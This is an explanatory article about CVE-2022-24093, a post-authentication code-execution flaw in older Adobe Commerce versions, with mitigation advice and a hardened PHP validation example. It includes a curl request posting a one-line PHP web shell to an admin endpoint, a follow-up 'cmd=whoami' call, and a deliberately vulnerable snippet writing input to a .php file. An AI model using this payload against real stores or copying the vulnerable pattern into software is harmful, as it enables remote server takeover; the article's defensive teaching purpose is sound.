Adobe Commerce (previously known as Magento Commerce) is a popular e-commerce platform used by thousands of online stores worldwide. In early 2022, a serious vulnerability was discovered, tracked as CVE-2022-24093, which posed a huge risk for all websites running older versions of Adobe Commerce.  
Let’s break down what this bug is, how it can be exploited, see a code example, and, most importantly, how you can protect your store.

What is CVE-2022-24093?

CVE-2022-24093 is a high-severity vulnerability caused by *improper input validation*.  
That means Adobe Commerce software did not properly check user-supplied data somewhere inside its code. As a result, a hacker could craft a malicious request and, after logging in (post-authentication), use that to execute arbitrary code on the server—the attacker can run any code they want with the webserver’s privileges.

Affected versions: Adobe Commerce 2.3.7-p2 and earlier

If you are using any of these versions, your website is at risk unless you have patched it!

How Does the Exploit Work?

Here’s what makes this bug so dangerous: the vulnerability is in how user inputs are processed after logging into the admin panel. Adobe’s input validation fails to sanitize dangerous payloads in certain parameters.

Proof of Concept Code Snippet

Disclaimer:  
The following code is a simplified, non-destructive *example* designed to illustrate how such payloads might look and should never be used on a system you do not own or have explicit permission to test!

Suppose the vulnerable endpoint is /admin/[module]/[action]. The attacker could send a request like the following (for example, using curl):

curl -s -X POST \
  -H "Content-Type: application/json" \
  -b "PHPSESSID=admin-session-id" \
  -d '{"customAttribute":"<?php system(\$_GET[\"cmd\"]); ?>"}' \
  "https://yourstore.com/admin/module/action"

If the improper input validation allows this to be saved to a PHP file or included in a template, then a follow-up HTTP request like:

https://yourstore.com/path/to/vulnerable/file.php?cmd=whoami

would execute the whoami command on the web server, and the result would be shown in the browser or response.

Below is a *simplified* sample of what broken validation could look like in PHP:

// BAD: Vulnerable input processing (do NOT use)
// The request body is taken verbatim, with no validation, and written to a
// file with a .php extension under the web root, so the server will execute it.
$user_input = $_POST['customAttribute'];
file_put_contents("/var/www/html/var/tmpfile.php", $user_input);

If an attacker sends PHP code as customAttribute, it will be written directly to a PHP file and could be executed via the web server.
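The hardened counterpart to the snippet above, as an added example that is not Adobe Commerce's own code: it validates customAttribute against an allowlist and persists it as data rather than as a PHP file. The pattern, the storage directory and the file name are assumptions for the demo.

```php
<?php
// Added example, not Adobe Commerce code: a hardened counterpart to the
// vulnerable snippet above. Two independent defences: validate the value
// against an allowlist, and never write user-controlled bytes to a path the
// web server can execute.
declare(strict_types=1);

// Assumed allowlist for a short free-text attribute: letters, digits, spaces
// and a few punctuation marks, 1 to 64 characters. Adjust to the real field.
const CUSTOM_ATTRIBUTE_PATTERN = '/\A[\p{L}\p{N} .,_-]{1,64}\z/u';

function validateCustomAttribute(mixed $value): string
{
    if (!is_string($value)) {
        throw new InvalidArgumentException('customAttribute must be a string');
    }
    if (preg_match(CUSTOM_ATTRIBUTE_PATTERN, $value) !== 1) {
        throw new InvalidArgumentException('customAttribute contains disallowed characters');
    }
    return $value;
}

// Persist the value as data (JSON), under a fixed file name the client cannot
// influence, in a directory that is not served by the web server. The
// $storageDir argument is an assumption for the demo; Magento itself keeps
// attribute values in the database.
function storeCustomAttribute(string $value, string $storageDir): string
{
    $path = $storageDir . '/custom_attribute.json';
    $encoded = json_encode(['customAttribute' => $value], JSON_THROW_ON_ERROR);
    if (file_put_contents($path, $encoded, LOCK_EX) === false) {
        throw new RuntimeException('failed to write attribute');
    }
    return $path;
}

// Demo with constructed inputs: a benign value is stored, while the PoC
// payload from the article is rejected before anything touches the filesystem.
foreach (['Blue XL', '<?php system($_GET["cmd"]); ?>'] as $input) {
    try {
        echo 'stored: ', storeCustomAttribute(validateCustomAttribute($input), sys_get_temp_dir()), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Even with the allowlist in place, the value must still be escaped with htmlspecialchars() at the point where a template renders it, since validation on input does not replace output encoding.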

Mitigation and Fix

Adobe patched this vulnerability quickly—patches are available and all store owners are urged to apply them immediately.

If you’re on 2.3.7-p2 or earlier, upgrade to 2.3.7-p3 or later.

Apply Security Patches:

- Adobe sometimes releases independent patches for highly critical vulnerabilities. Download the patch for CVE-2022-24093 from Adobe’s official security bulletin.

Further Reading and References

- Original Adobe Security Bulletin (APSB22-12)
- CVE entry at MITRE
- Magento Open Source Security Patches
- Community advisory & exploit analysis

Summary

CVE-2022-24093 is a critical vulnerability that can allow attackers, after logging into your admin panel, to run any command on your web server. You don’t want to be in the headlines as the next data breach victim!

What to do:

Stay on top of security updates.

Remember: Security is an ongoing process—don’t wait for attackers to find you!


*If you found this article useful, share it with others—you might save someone a lot of trouble!*

Timeline

Published on: 09/12/2023 08:15:00 UTC
Last modified on: 09/12/2023 11:52:00 UTC